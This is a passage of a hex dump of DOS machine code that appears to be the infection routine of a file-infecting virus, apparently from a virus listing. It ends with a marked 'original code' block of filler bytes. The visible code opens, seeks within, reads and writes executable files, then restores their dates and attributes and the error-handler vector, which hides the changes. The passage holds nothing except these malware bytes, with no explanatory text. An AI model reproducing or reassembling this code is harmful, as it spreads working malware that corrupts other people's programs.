1E 70 00 B8 00 .#p..H.X.@..p.8. ;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I ;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW. ;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M ;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9. ;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4 ;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM! ;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M ;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M! ;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_ ;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I. ;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x.. ;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.# ;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6 ;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!| ;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e. ;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3 ;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O. ;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|... ;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@ ;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!.. ;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t. ;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E ;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E. ;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X. ;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................ ;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M............... ;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<. ;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k............. ;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]... ;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R......... ;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ ;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K.......... ;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... ;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ ;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:.... ;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................ ;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P.. ;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O...... ;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~ ;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p. ;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%....... ;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M............... ;<<<<<<<<<< ORIGINAL CODE BEGINS HERE ;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC ;>>>>>>>>>> ORIGINAL CODE ENDS HERE ;0910 4D 73 44 6F 73 ;-----------------------------------------------------------------------; END